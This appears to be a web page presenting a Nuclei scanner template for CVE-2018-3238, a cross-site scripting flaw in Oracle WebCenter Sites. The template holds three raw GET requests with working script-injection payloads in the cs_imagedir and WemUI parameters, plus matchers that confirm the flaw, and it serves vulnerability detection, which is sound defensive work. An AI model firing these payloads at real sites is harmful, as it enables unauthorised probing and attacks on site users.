Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting

ID: CVE-2018-3238

Severity: medium

Author: leovalcante

Tags: cve2018,cve,oracle,wcs,xss

Description

The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.

YAML Source

id: CVE-2018-3238

info:
  name: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting
  author: leovalcante
  severity: medium
  description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patches and updates provided by Oracle to mitigate this vulnerability.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://www.oracle.com/security-alerts/cpuoct2018.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3238
    - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 6.9
    cve-id: CVE-2018-3238
    epss-score: 0.00471
    epss-percentile: 0.75585
    cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: oracle
    product: webcenter_sites
  tags: cve2018,cve,oracle,wcs,xss

http:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'

      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'Variables.cs_imagedir'
        condition: and
# digest: 4a0a0047304502204a3ca8db923c95bf17bfe6cdfd8f5b36fc0dcdd5922cda14ba632ab26f84382b022100e34a4700b31cdae32f6dc95940a9c9fbe3557abf5a05139a8457b96b729c95f6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-3238.yaml"

View on Github